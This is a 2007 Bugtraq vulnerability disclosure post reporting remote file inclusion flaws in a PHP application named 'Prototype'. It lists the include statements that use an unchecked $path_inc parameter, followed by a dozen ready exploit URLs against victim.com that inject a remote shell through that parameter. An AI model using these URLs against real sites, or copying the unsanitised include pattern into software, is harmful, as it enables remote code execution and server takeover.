
Date: Fri, 01 Jun 2007 15:26:19 +0300
From: "pito pito" <the-modest-pirate@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Prototype of an PHP application ===> RFI

****************************************************************************************
Prototype of an PHP application ===> RFI
***********
url: 
http://sourceforge.net/project/showfiles.php?group_id=196435&package_id=232559&release_id=509638
*************
author: titanichacker (egy-virus)
*************************
*bug in:*
********
/gestion/index.php
include_once($path_inc."common.inc.php");
************
/ident/identification.php
include_once($path_inc."common.inc.php");
include($path_inc."index.php");
include_once ($path_inc.'plugins/esup-phpcas/source/CAS/CAS.php');
*************
/ident/disconnect.php
include_once($path_inc."common.inc.php");
include_once ($path_inc."ident/identification.class.php");
***********
/ident/loginliste.php
include_once($path_inc."common.inc.php");
include($path_inc."menu/menuadministration.php");
***********
/ident/loginmodif.php
include_once($path_inc."common.inc.php");
include($path_inc."ident/loginliste.php");
***********
/ident/index.php
include_once($path_inc."common.inc.php");
include ($path_inc."menu/menuadministration.php");
***********

/ident/ident.inc.php
include_once ($path_inc."plugins/phpgacl/gacl.class.php");
include_once ($path_inc.'plugins/esup-phpcas/source/CAS/CAS.php');
***********
/menu/menuadministration.php
include_once($path_inc."common.inc.php");
***********
/menu/menuprincipal.php
include_once($path_inc."common.inc.php");
***********
/param/param.inc.php
include_once($path_inc."param/param.default.inc.php");
***********
./index.php
include_once($path_inc."param/param.default.inc.php");
***********
./common.inc.php
include_once($path_inc."param/param.inc.php");
include_once($path_inc.'plugins/objetBDD/ObjetBDD.php');
***********
/plugins/phpgacl/admin/index.php
include_once($path_inc."common.inc.php");
*******************************************************
exploit:(  *
***********
http://victim.com/script/gestion/index.php?path_inc=[shell]
http://victim.com/script/ident/identification.php?path_inc=[shell]
http://victim.com/script/ident/disconnect.php?path_inc=[shell]
http://victim.com/script/ident/loginliste.php?path_inc=[shell]
http://victim.com/script/ident/loginmodif.php?path_inc=[shell]
http://victim.com/script//ident/index.php?path_inc=[shell]
http://victim.com/script/ident/ident.inc.php?path_inc=[shell]
http://victim.com/script/menu/menuprincipal.php?path_inc=[shell]
http://victim.com/script/param/param.inc.php?path_inc=[shell]
http://victim.com/script/index.php?path_inc=[shell]
http://victim.com/script/common.inc.php?path_inc=[shell]
http://victim.com/script/plugins/phpgacl/admin/index.php?path_inc=[shell]
****************************
dork:(
***********
thanx  *
*******
       cold-zero & mohandko & trayg & xp10 & arb-hawk & drbaka & kof2002 & 
zax & milw0rm
****************************************************************************************

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

